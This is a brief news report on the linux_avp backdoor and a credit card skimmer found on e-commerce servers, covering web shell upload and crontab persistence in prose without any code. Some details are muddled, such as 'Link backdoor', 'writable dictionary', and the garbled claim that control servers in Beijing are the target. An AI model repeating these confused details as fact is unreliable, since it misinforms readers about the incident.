Last Updated on 26/11/2021 by Anamika
Reportedly, cybercriminals are now using a new kind of hacking campaign that is using Linux backdoor on e-commerce websites. It includes deploying a credit card skimmer on the websites.
The researchers at Sansec Threat Research were able to find a new malicious malware/agent named linux_avp which is known to hide as a system process on e-commerce website servers.
The hackers have been deploying this malware since mid-November and are targeting the control servers in Beijing.
The main aim of the attackers to use Link backdoor is to find out the weaknesses of various e-commerce websites and make the websites vulnerable at once, causing major harm.
“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data”According to the reports of ITPro
The malware also has a way to get into the servers which have been removed or rebooted. It uses malicious crontab entry and it then downloads the Golang malware to execute to a random writable dictionary which further installs two configuration files.
The malware is affecting a lot of e-commerce websites at large but the reason is still not clear that why is it just being targeting the servers from Beijing?